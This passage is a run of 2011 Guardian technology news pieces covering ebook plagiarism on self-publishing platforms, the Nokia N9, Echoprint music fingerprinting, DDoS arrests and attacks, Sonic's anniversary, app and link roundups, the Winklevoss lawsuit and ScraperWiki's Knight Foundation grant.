Darkside by SKS Perry. When I linked to the page I saw that it was, in fact, my novel for sale."Perry isn't the only person facing this issue andThey Stole My Book.comlists other authors who have had their work reproduced illegally, often in the case of free books being repackaged at a price. For Perry he reported the book via Amazon, filed a DMCA takedown notice, left phone messages with Amazon and sent additional paperwork before the book was taken down.Before the book was removed Perry carried out an experiment to see if Amazon would allow another version of the book to be listed by him. He was able to upload exactly the same content and create a duplicate version of the book on the site. What really surprised Perry is that his book was "under review" before it was made live for 48 hours, but was still allowed through the process, despite being identical to another existing book on the Amazon database.When the book was removed Perry received neither confirmation nor any compensation for sales that occurred from the fake version of his book. He was never given any indication that the author of the fake version had been punished in any way, other than the book being removed. No information was detailed on actions that would stop the fake author repeating the process in the future.While Amazon, Lulu and Smashwords all offer options to report bad content, the onus is on writers to find their stolen content in the first place. Coker suggests running Google searches for strings of content from an author's book as a means of seeing if it has been reproduced elsewhere. All three providers emphasise that they have automated and manual checks in place to spot bad content, but as shown by Perry these are not always effective.While Reece and Nijmeh create original content, they both admit that many PLR sellers have terrible mass-produced text. "I think some people get very lazy with PLR and don't want to change any elements of it so what happens is you get terrible duplicates." explains Reece, pointing out that even with a good team of writers, "it's important to note that what the buyer does with the PLR is up to them".So does customer protection instead lie with ebook content providers? One line of defence Coker highlights is a three-point system, with Smashwords relying on its filters and the community to spot problems, and that Smashwords itself acts as judge and jury, taking all claims of copyright violation seriously. For Lulu the only automated check is to look at whether an ISBN has been used before, something that can quickly be bypassed with a fake ISBN, with other checks occurring manually when a 'report this content' button is clicked on any book.Both McDonald and Coker stress that any questionable content will result in a ban for the author. Unless they can prove ownership, the authors will lose any accrued revenue from the current quarter. This gives them three months to find stolen content, which compared to a shorter payment system for Amazon allows for a much higher chance of catching bad content before any money is lost.None of this completely stops the issue of poor-quality PLR content, which could simply be of low quality or have no formatting for ebooks. In this case another line of defence is implemented by Lulu and Smashwords, at the request of the platforms to which they distribute, including Apple and Barnes &amp; Noble. McDonald puts it best: "As Lulu continues to grow our global network of third-party retailers; we must adhere to their guidelines to ensure the utmost quality for our authors' content and their customers."This level of regulation is driven by Apple which insists on a six-week turnaround for all books and apps. Smashwords and Lulu have to ensure the content they provide to Apple is of high quality, or they risk losing these distribution agreements. When Coker first signed a distribution deal with Barnes &amp; Noble he introduced a 'premium catalogue' to only provide them with the best books. Over time this evolved in to a 60-page style guide which all books submitted to these high end sites via Smashwords must abide by. An automatic tool then checks books against these guidelines, and a manual check is made on every book before it is sent. Lulu also uses ePub validation guidelines to ensure formatting for high-end sites is correct before they will accept a book.All of these checks are great for Apple, but are not enforced by Amazon whose 48-hour turnarounds has seen them accused of duplicate books and poor-quality content. Coker is not convinced Amazon is as effective as it could be: "We have deleted the accounts of dozens of PLR scammers, and often I'll see those same scammers turn around and upload their content directly to Amazon. The Kindle Store is awash in it." He continues: "They aggregate a larger customer audience, and they let a lot of stolen stuff through."Amazon did not respond to repeated requests for comment over a number of weeks.One such tool is designed to manipulate the system by repackaging public domain content scraped from the web in to quick ebooks. Owners of the software can generate hundreds of books and it promises "totally hands-free income".None of this is good for consumers, and as Coker puts it, "The risk of PLR is that you see 50 copies of the same book on the same shelf written by equally lazy-ass idiots who got suckered in to the scam. Then customers, trusting they're buying a real book, purchase these books of questionable value. "Digital books are still at the early part of their life cycle and many customers are embracing the ebook format for the first time. Impulse purchases that result in low-quality content are not likely to lead to future sales for legitimate authors. Likewise any books which are purchased legitimately but found to be stolen by another author will be removed from a customer's device through no fault of their own.Although both McDonald and Coker are quick to highlight that they have only seen a small percentage of authors affected they agree that more can be done. For Coker and Smashwords it is about control and punishment: "I think we make the PLR folks jump through more hoops, our vetting is tighter and more effective, and we simply make it more difficult for them to earn a dime off the scams." McDonald and Lulu are focused on the legal aspect of PLR and stolen content: "We must stay on top of all laws or make a blanket decision to not distribute public domain content outside of the US."Even with these systems in place, Coker feels that "ebooks will continue to attract the dregs of the cybercrime underworld". While PLR can contain well-researched content, it is also being manuipulated on a grand scale both by people who write poor-quality content, or buyers who repackage the same content in multiple ways. Ultimately while the main providers of ebooks are taking action and giving customers and authors the power to take back control there are clear loopholes that need to be closed.•Mike Essex is online marketing manager at digital marketing agencyKoozai LtdUpdated: corrected link to Manuel Ortiz.
Aww, isn't it pretty? The video is Nokia's new N9, and it's a swipey-thingy interface that has everyone going "wow". Though of course as Dean Bubley, of Disruptive Analysis,commentedthis morning: "Lots of positive comments about the Nokia N9. But let's wait to see battery life, radio performance, software stability &amp; all the rest first, yes?"(Chorus everyone saying "No, let's just buy it unseen."")So who's going to buy the Nokia N9? According to Francisco Jeronimo, research manager for European mobile devices at the analysts IDC, pretty much nobody. Or nobody that matters. In a research note, he comments:This new N9 is probably the best user interface that Nokia has delivered on a smartphone to date. The UI [user interface] is intuitive, easy to use, fast and running in a beautiful designed hardware featuring high-end specs. Although, despite probably being the best smartphone that Nokia has ever launched it may easily be a "death-on-arrival".Hang on, dead on arrival? Why?Mobile Operators will hardly launch the device. Being the first and last MeeGo device, there's no roadmap available. Without a line-up of new products coming out, the platform and this device will not be supported by most operators (if any) in Europe. They already support several and successful operating systems, so there is no major reason to add a new one, which was killed this year with the new WP7 strategy.Consumers may be attracted by the user experience but will easily be put off by the lack of applications and a rich ecosystem as opposed to Apple's iPhone or Android devices. On the other hand without operators subsidising the device, consumers will have to pay a premium price for a high-end product that does not give them any additional value compared to its competitors.And now here comes the damning conclusion:So, is this the right time for Nokia to launch this device? In my opinion No. Nokia does not need a niche device with poor sales. As a solo device without roadmap, ecosystem or operators subsidies, the N9 will be another struggling device adding up on top of Nokia's difficult situation. Secondly Nokia's message has been clear. The company has a strategy and is executing it as fast as they can. Launching a MeeGo device ahead of WP7 would only make sense to help the transition from Symbian to WP7, which will not happen with a short-living product. It can even be counterproductive if the WP7 device does not provide a similar experience to the N9, raising the question whether or not the WP7 was the right platform to compete in the smartphones battlefield. The WP7 OS stills performing poorly on the market, representing only 3% of the worldwide smartphone shipments in the first quarter 2011.His parting shot: "How does this device help Nokia then? The N9 shows that Nokia can get it right!.."The N9 shows that Nokia can produce a beautiful device running a delighting experience, which raises the expectations to the WP7 devices later this year."Oh, and speaking of Windows Phone (not WP7, Francisco - Nokia is going to launch "Mango" phones in October or later), what's this that Stephen Elop, chief executive of Nokia has to show off here?Wow. Notice how carefully he told everyone to turn off their cameras and recording equipment? If there had been a big flashing sign saying "FILM THIS NOW" it would hardly have been better.We believe this is Elop presenting at the Communasia communications symposium in Singapore. (The time on the phone is 10:46 on Wednesday June 22. At least according to the phone.) Notice how remarkably still the camera is. How it is broadcast-quality despite shooting over a roomful of people. Notice how it is on a tripod (no camera shake). This is not some samizdat piece of citizen journalism; it's a carefully spun piece of PR.It's something "we do not want to see out in the blogosphere." No, of course not. We're not showing it here at all. It's not a careful tease by Nokia. No, no, not at all.Meanwhile the N9 is still DOA (especially after this careful kimono-opening which has oops! accidentally gotten out into the blogosphere)  except to rich people who want to buy it SIM-unlocked to experience what looks like a very interesting UI. Enjoy.Update:there's a much longer version (22-minute) of the kimono-tweaking with the phone - apparently codenamed Sea Ray - atTechnet.hubut it's overwhelmed with demand at present. Thanks @rquick in comments.
Yesterday, mobile discovery firm Shazamraised $32 millionand talked about its ongoing move beyond basic music identification. A good thing, too, for today US company The Echo Nest is launching a platform that lets any developer create their own baby Shazam for a fraction of the cost.It's calledEchoprint, and is being touted as the world's "first fully open-source music fingerprint service", drawing on UK firm 7digital's catalogue of 13 million songs, and with plans to expand its database over time as more apps are launched using it."Music fingerprinting should belong to the Internet," says Echo Nest co-founder and chief technology officer Brian Whitman, in a statement."It should be a service that every developer can rely on without worrying about licensing fees or complicated database implementations... Any music experience, from a streaming cloud service to a social music game can now immediately include music recognition. We're giving people the client and server along with the data, and we can't wait to see what they build with this."The interesting thing about Echoprint is most certainly not the prospect of dozens of independently developed rivals to established music identification apps like Shazam and SoundHound, however.Instead, the opportunity here is for this music fingerprinting technology to make its way into a wide range of apps, sitting alongside other features. The Echo Nest cites social networks and location based services as two categories that may benefit, for example.A streaming music service like Spotify might use Echoprint to bring song identification into its own app, rather than relying on its current partnership with Shazam. You can even imagine some developers creating games around the technology.The key point is that developers will now be able to play with audio fingerprinting technology resolving to a database of 13 million tracks, complete with 7digital's store for track purchases, and streaming service APIs from the likes of Spotify and Rdio.That's why Echoprint's significance is much less about its likely impact on Shazam's business model - which in any case has gone well beyond basic track recognition - and much more about fuelling a new generation of music apps where track identification is just a piece of the puzzle.
The British teenager accused of bringing down the website of the Serious Organised Crime Agency (Soca)is being held in custody at a London police station for further questioning over allegations of computer hacking.Ryan Cleary, 19, was unshaven and wearing a white T-shirt and matching tracksuit bottoms as he stood in the dock for a 10-minute hearing at Westminster magistrates court in central London on Thursday morning.Cleary, who spoke only to confirm his name and date of birth, was remanded in custody at London's Charing Cross police station for a maximum of three days for further questioning about the alleged attacks.The Essex teenager was charged with five offences on Wednesday as part of an international investigation into cyberattacks against the CIA, the US Senate and the electronics giant Sony.Cleary was charged by the Metropolitan police with three specific attacks, including one earlier this week on Soca. Cleary is also charged with attacks against music trade bodies the British Phonographic Industry and the International Federation of the Phonographic Industry.Ben Cooper, the lawyer representing Cleary, said he was "fully co-operating" with the ongoing police investigation and that he "wishes to co-operate further".Cooper described Cleary as a "vulnerable young man", adding that there were "certain matters being looked into with regards to his vulnerability".His mother, Rita Cleary, dressed in black, sat with another female relative in the public gallery for the hearing. Cleary, whose neighbours say is a bright teenager who rarely ventured outside of his bedroom, looked continually at the packed press bench as his lawyers told the magistrates court that he may yet face further charges.The investigation into whether he is involved in any other attacks, including ones outside the UK, is continuing.The method Cleary is alleged to have used is a distributed denial of service (DDoS) attack against all three websites. He was also charged with constructing a botnet, a network of infected computers that can be used remotely to direct attacks.Alleged attacks against the BPI and the IFPI were carried out as part of an Anonymous campaign in October and November last year.
Hackers attacked servers used by News International to publish some of its digital content at 2am on Thursday morning, apparently in retaliation for coverage in the Sun of the activities of the LulzSec hacking collective.A senior source within News International confirmed to the Guardian that third-party architecture was affected for a couple of hours by a distributed denial of service (DDoS) attack, in which hundreds or thousands of machines make repetitive demands on an internet server.The computers used for the attack were mainly based in Russia, but that does not mean that the people behind it were based there.However, the attack did not delay the publication of the newspaper, and only caused delay in some of the digital publication, the source said."We haven't linked it to any particular coverage … the infrastructure that was affected isn't linked to The Sun."Newspaper groups are on high alert at the moment for DDoS attacks from hacker groups as the issue has risen to prominence following the arrest on Tuesday of a man in Essex who has been charged with offences relating to attacks on websites.Some hackers take offence at what they see as biased coverage.No group appears to have claimed responsibility for this latest attack.
Would you believe that Sonic the Hedgehog is 20 years old? Since bursting on to consoles in 1991, the gaming world has changed immeasurably, yet Sonic spins on. It's a remarkable achievement in a fast-moving industry, making Sonic a powerful ... brand? Character?"First and foremost, Sonic is a character," explains Sega Europe's chief executive Mike Hayes, although the presence of David Corless – whose business card reads "Sonic Brand Director" – suggests the company is very aware it's both.Neither Mike nor David worked for Sega at the time of Sonic's launch. Mike was working with arch rivals and Mario-creators Nintendo: "Sonic was something we only played to see how the opposition was going."The success of Sonic clearly echoes back to those old days of console rivalry. "Sega was the arch-enemy," laughs Mike. "It's quite ironic that Mario and Sonic came together [for the "at the Olympic Games" title]. In my day, that would have been inconceivable."Nintendo v Sega got big articles in things like the Mail on Sunday. It was as big as Coca-Cola vs Pepsi, Levi vs Wrangler, the Rolling Stones vs the Beatles ... At Nintendo we were more family friendly, the Beatles and Coca-Cola to Sega's Stones and Pepsi. They were more cutting edge, Oasis to our Blur, and we played it up. There was nobody else in the business and at that point, and we thought that nobody else would join. And then, of course, along came Sony and changed the game."While 30-something (and above) gamers will remember those times, it's perhaps strange for younger gamers to consider that this was ever the case."Kids now are agnostic," confirms Mike. He holds up his iPhone. "My kids are all about this at the moment. That whole Xbox vs PS3 or DS, that's sort of disappeared. We can't play on those stories anymore, the big newspaper coverage has gone.""I think part of the problem is we don't have celebrities," adds Corless. "We don't have a Brad Pitt, a Robbie Williams. That's why we play up Sonic so much: with Sonic and Mario you've got two of the only recognisable characters in the video gaming world."The relative lack of newspaper exposure hasn't harmed the business and it's certainly become more mainstream and acceptable – and highly lucrative as a commercial model."At first, when I went around for dinner with friends, those with children would tut and say 'Video games? I make sure they don't play.' Now it's 'So what's the next thing? Should I buy a 3DS or wait?'. When you see that Call of Duty is 2010's biggest-selling piece of media, then it's Avatar, then it's Fifa. Out of the top three, two are video games. The biggest CD is nowhere close in terms of volume let alone revenue."In terms of answering those friends' questions or predicting where Sonic will be in another 20 years, both David and Mike happily shrug."What we want to do in coming years is push Sonic further," reveals David. "How do we make Sonic even more relevant for 12-, 13-year-olds but still deliver the nostalgia to the older market? It's a challenge but quite a luxury: there are very few gaming IPs where that applies.""Sonic's transferable across platforms, that's definitely been proven," states Mike. "We've had huge success on Apple, PSN, XBLA, all the traditional platforms, handheld and TV-based. Do we take Sonic to a freemium model for a different audience? Do we think how Sonic can be more episodic on a tablet, for example? I have no idea – that's the interesting thing – but I think Sonic will carry on, because it's such an icon."•Sonic the Hedgehog will appear in two games released in 2012: Sonic Generations and Mario &amp; Sonic at London 2012.
A burst of 14 apps for your consideration. Thursday is the big release day for new games on the App Store, which is why there are a number of iPhone and iPad games in today's selection.ExfmExfm started life as a plugin for the Chrome web browser, helping people to play music embedded within websites and blogs. It has since pivoted into a music discovery service, which now has its own iPhone app. Users can play new songs and their own collections, see what friends have been recommending, and scrobble their listening to Last.fm.Firefox 5Mozilla has released Firefox 5 for Android smartphones, including some of the new features from the just-released desktop version of the browser. That includes more control over data and privacy, and promised faster page loading.Cars 2 Storybook DeluxeDisney has released its latest iPad book-app, based on the Cars 2 movie. A choice of reading modes, mini-games and virtual jigsaw puzzles are accompanied by a record-your-own narration feature.BackStabGameloft's BackStab action-adventure started life as an exclusive for Sony Ericsson's Xperia Play phone, and has now made the leap to iPhone and iPad. The 3D action-adventure offers big-budget visuals and piratical thrills.1-bit NinjaThere's a big buzz around games developer kode80's 1-bit Ninja, which has been released for iPhone today. The retro 2D jump-and-run game can be dragged into 3D to find secret passages, with a chiptune soundtrack to tap your feet to along the way.BlackBirdBlackBook claims to be the "quickest, easiest and best looking Twitter client for BlackBerry PlayBook" – not a hugely crowded market at the time of writing. It supports multiple accounts and the usual tweeting features.Monkey Island Tales 2 HDPublisher Telltale has released the second Monkey Island Tales game for iPad, and for good measure has also released Monkey Island Tales 3 HD, Monkey Island Tales 4 HD and Monkey Island Tales 5 HD on the same day.Sonic &amp; Sega All-Stars RacingAn iOS game for everyone who's ever thought "Sonic the Hedgehog would be much better if he was inside a car pretending to be in Mario Kart". The game stars Sonic and nine other Sega characters, with the obligatory mix of missiles and traps.D.A.R.K.D.A.R.K. is the latest iPhone game from UK publisher Chillingo, offering space marine-themed action-RPG shooting. With flamethrowers.Lufthansa for iPadTouting the "fascinating world of Lufthansa" in the first line of the App Store listing may be pushing it a bit, but the airline's app certainly has plenty of features. A world map to explore routes, tourist information on more than 70 destination cities, weather forecasts and the ability to check in and manage air miles are all included.BanjoAnother day, another social location app. Banjo is out for iPhone and Android, and aims to connect users with people around them, pulling in people from Facebook, Twitter and other social services with geotagged updates.WobbleThe latest music toy for iPhone is a "dubstep wobbler" offering a mixture of wobbles, noises and beats, with intriguing plans to release additional packs of samples from famous dubstep musicians.Do Some GoodOrange has released its charitable Do Some Good app for Nokia devices on the Ovi Store, with suggestions of five-minute activities and music rewards for people who spend four hours doing several of them.The Future by AirbusAirbus is promoting its vision for air travel in the year 2050 with a new iPhone and iPad app subtitled Concept Cabin. Expect a virtual tour of the futuristic plane's 'intelligent, transparent wall membrane' and other features.You can followGuardian Apps Blog's Apps rush on deliciousTo suggest links, tag articles on delicious.com with "guardianappsblog"
A burst of 9 links for you to chew over, as picked by the Technology teamPremature cries of Silverlight / WPF skill loss. Windows 8 supports all programming models &gt;&gt; Burela's house-o-blogWorth a read. The question is still: yes, they're all supported. But which is easiest to make happen? You could say that all platforms "support" various languages.IT'S ON: Hulu Hires Morgan Stanley To Help With Sale &gt;&gt; Business Insider"CNBC's Julia Boorstin reports that Hulu has hired Morgan Stanley and Guggenheim partners to help with its sale.'To the auction block!' she tweets."How much of a car crash would it be if Yahoo buys Hulu? Or would it be great? (By the way, we love BI's old stock photos.)Azure Could Be Microsoft's Paid SkyDrive Expansion &gt;&gt; I'm Just Being Manan"I'll rephrase: Azure *should* be Microsoft's paid SkyDrive expansion option.&#10;"There are always some developments that excite you enough to stop slacking and start typing. Microsoft's announcement of making uploads or as they call it, "inbound traffic," free on Azure is one of them.&#10;"Reading Mary Jo's post on the topic made me realize that this move could be more than just an enterprise play. Microsoft overhauled SkyDrive last week keeping the 25GB account limit. Apple's iCloud is 5GB but with some smart tech in the background (read: Azure &amp; AWS) they are able to serve media you bought through iTunes on all devices, without you having to download, upload, sync this data."Now uploads to Azure are free, will Microsoft try to get people to do that and use the processing power there too?Escape your search engine filter bubble &gt;&gt; Hacker NewsMatt Cutts of Google dives into the discussion on how to keep away from your personalised web history.Generate CSS for sprite sheets &gt;&gt; Sprite Cow"Sprite Cow helps you get the background-position, width and height of sprites within a spritesheet as a nice bit of copyable css.&#10;"Why? Automated spritesheet generators are pretty cool, but I prefer the control over optimisation and compression you get by making them manually."Lodsys attacking more indie Android developers who use in-app purchases &gt;&gt; Droid Gamer"Lodsys LLC, if you haven't heard about them yet, is a company that holds a patent that applies to 'in-app purchases' even though applying it to mobile in-app purchases is stretching it. Lodsys LLC isn't just hitting Android indie developers, a bunch over on the iOS platform also have received letters of intent from the company."Apple granted patent on webpage scrolling behaviors; media granted patent on crazy &gt;&gt; This is my next..."Now, the key to understanding patents is to read the claims. That's step one. Every single element of each claim is important! Anything that doesn't hit on every single element of the claim doesn't infringe. And any patent article that doesn't include a specific analysis of the claims isn't worth your time. It's that simple."Google: 'At scale, everything breaks' &gt;&gt; ZDNet UKFascinating interview with Google's first vp of engineering Urs Hölzle: "..[open source] started with the operating system, which was the lowest level that everyone needed. But the power of open source is that you can continue to build on the infrastructure that already exists [and you get] things like Apache for the web server. Now we're getting into a broader range of services that are available through the cloud.&#10;For instance, cluster management itself or some open-source version will happen, because everyone needs it as their computation scales and their issue becomes not the management of a single machine, but the management of a whole bunch of them. Average IT shops will have hundreds of virtual machines (VMs) or hundreds of machines they need to manage, so a lot of their work is about cluster management and not about the management of individual VMs."RIM lowers internal 2Q11 sales target for PlayBook &gt;&gt; Digitimes"RIM, viewing that only about 500,000 PlayBooks, its first tablet PC, were sold globally from its launch in mid-April to early June, has downward adjusted its internal sales target for the second quarter, from 2.4 million units originally to 800,000-900,000 units, according to sources from Taiwan-based supply chain makers.&#10;"The sources pointed out that the PlayBook achieved strong sales of 40,000-50,000 units on its launch day, but demand from then to mid-April was lower-than-expected. RIM originally set to ship 2.4-2.5 million PlayBooks three months after launch, but since the company was only able to sell about 500,000 units in total by early June, it will be difficult for the company to achieve its original goal, the sources explained."(May require subscription after expiration period.)You can followGuardian Technology's linkbucket on deliciousTo suggest links, tag articles on delicious.com with "guardiantech"
The Winklevoss twins, the former classmates and business partners of Facebook founder Mark Zuckerberg, have decided to end their legal battle over whether the idea for the social networking site was stolen from them.The case that launched a thousand cinema trips – after it became the basis for the Hollywood film The Social Network in 2010 – ended with a whimper rather than a bang in a one-paragraph court filing by the twins. They said they would forgo a trip to the US supreme court and accept a 2008 settlement which gave them a mixture of $20m cash and Facebook stock which at the time was worth around $45m. Since then the putative value of the privately-held Facebook has grown more than fourfold, from $15bn to $70bn. The twins' stock is thus in theory worth more than $150m.The Winklevoss's accusation forms a core element of the 2010 film, which includes many of the legal battles that Zuckerberg fought in the creation of the site.But another lawsuit against Zuckerberg, byPaul Ceglia, a New York-based former wood-pellet salesman who argues that a 2003 contract with Zuckerberg gives him a claim to a large share of the company, which was started in 2004, continues. Facebook has called Ceglia's claim "fraudulent" and pointed to his former convictions on counts of fraud.The Winklevoss twins had for some time sought to undo the 2008 settlement, complaining that Facebook left out key information during the negotiations which mean they did not receive as many shares as they should have. Butthe 9th US circuit court of appeals ruled against them, saying they had been represented by a squadron of Silicon Valley lawyers and their father, a noted business professor.
Thursday!And by the way, I'll be hosting a Gamesblog Pub Quiz as part of the Develop Conference in Brighton on July 18. Everyone's welcome! It'll be at the Caroline of Brunswick pub from 8pm. We need teams of four to sign up and get involved. There will be questions on video game trivia, as well as video game-based challenges.If you'd like to register a team in advance, email me at The Guardian – it's my first name dot surname at Guardian dot co dot ukIt would be great to have at least one Chatterbox team there!
ScraperWiki, the British startup website which enables people to write code to "scrape" sites for public data, haswon a grant of $280,000 from the Knight Foundationto help expand its offering to journalists and other users around the world.ScraperWiki's chief executive Francis Irving received the cheque at an awards ceremony in Cambridge, Massachusetts on Wednesday evening.Another British project, by the Open Knowledge Foundation, also won funding for a scheme to give greater context to reports about government finance spending."The UK is leading the world in the open data field and it is wonderful for us, a high tech British company focused on this area, to get recognition and validation in the US," said a spokesperson for ScraperWiki. "Our application is all about making ScraperWiki useful to journalists around the world and the prize money will be used to add functionality to our platform.  We will also run events across 12 cities in 12 US States - to liberate local, state and Federal data.  Our kick-off event will happen at the University of Berkeley in California in late autumn."ScraperWiki offers an online editor where users can gather public data by creating "scrapers" - small programs to extract content from data sites - with the programming languages Python, PHP or Ruby. There is also a datastore which lets users store and query data, plus a viewer which lets data be mapped and presented graphically.Irving said: "ScraperWiki is a place for doing data journalism. What matters is the people who use it. We've found activist coders itching to find stories. We've found journalists who know that data is a new source, and want better waysto access it. I'm excited that the Knight Foundation is funding us to both make better tools for that community, and to run events to find the people who care across the US."He added: "The world is increasingly complex and its future tipped on a balance more than ever. Together we can sift the data, and perhaps help tip it the right way."The Knight Foundationhanded out a total of $4.7m, including $1m from Google, to a total of 16 organisations to help fund digital news experiments.Other winning ideas were:•iWitnessby Adaptive Path, to "create a web-based tool that aggregates user-generated content from social media during big news events."•Overviewby the Associated Press, "a tool to help journalists find stories in large amounts of data by cleaning, visualizing and interactively exploring large document and data sets."•News Taskforceby the Awesome Foundation: bringing together 10 to 15 community leaders and media innovators in Detroit and two other cities to provide $1,000 microgrants to innovative journalism and civic media projects.•PANDA, by the Chicago Tribune, to "build a set of open-source, web-based tools that make it easier for journalists to use and analyze data".•DocumentCloud Reader Annotations, by Investigative Reports and Editors, which "helps journalists analyze, annotate and publish original source documents. Hundreds of newsrooms are already using the tool."•Frontline SMS, by the Kiwanja Foundation of Palo Alto, which "will create a new platform that allows journalists to more effectively use text messaging to inform and engage rural communities."•Zeega, by Media and Place Productions of Cambridge, Massachusetts, which "improve its open-source HTML5 platform for creating collaborative and interactive documentaries."•The State Decoded, by the Miller Centre Foundation of Charlottesville, which " will be a platform that displays state codes, court decisions and information from legislative tracking services to make [the US] government more understandable to the average citizen."•Poderopedia, by El Mostrador of Chile, which will promote transparency and "will be an editorial and crowdsourced database that highlights the links among the country's elite."•Nextdrop, by Nextdrop of Berkely and Hubi-Dharwad of India, which "will launch a service, in conjunction with local utilities, that notifies residents of Hubli, Karnataka, India when water is available" - not always a predictable event in India.•Spending Storiesby the UK's Open Knowledge Foundation from Cambridge, which "will contextualize news pieces about government spending by tying them to the data on which they are based."•The Public Laboratory, by The Public Laboratory for Open Technology and Science in Cambridge, Massachusetts, "will create a tool kit and online community for citizen-based, grassroots data gathering and research."•ScraperWiki, which "will add a 'data on demand' feature where journalists can request data sets and be notified of changes in data that might be newsworthy, and data embargos that will keep information private until a story breaks."•Tiziano 360, by the Tiziano Project of Los Angeles, "will display the work of professional and community journalists and will enable news organizations, community groups and individuals to easily manage digital content for mobile and tablet devices".•OpenBlock Rural, by the University of North Carolina, which "will work with local governments and community newspapers in North Carolina to collect, aggregate and publish government data, including crime and real estate reports, restaurant inspections and school ratings."• Swiftriver, by Ushahidi of Orlando, Florida, which will try to make sense of data coming out of news events: "Working across email, Twitter, web feeds and text messages, the platform will use a combination of techniques to identify trends and evaluate the information based on the creator's reputation."
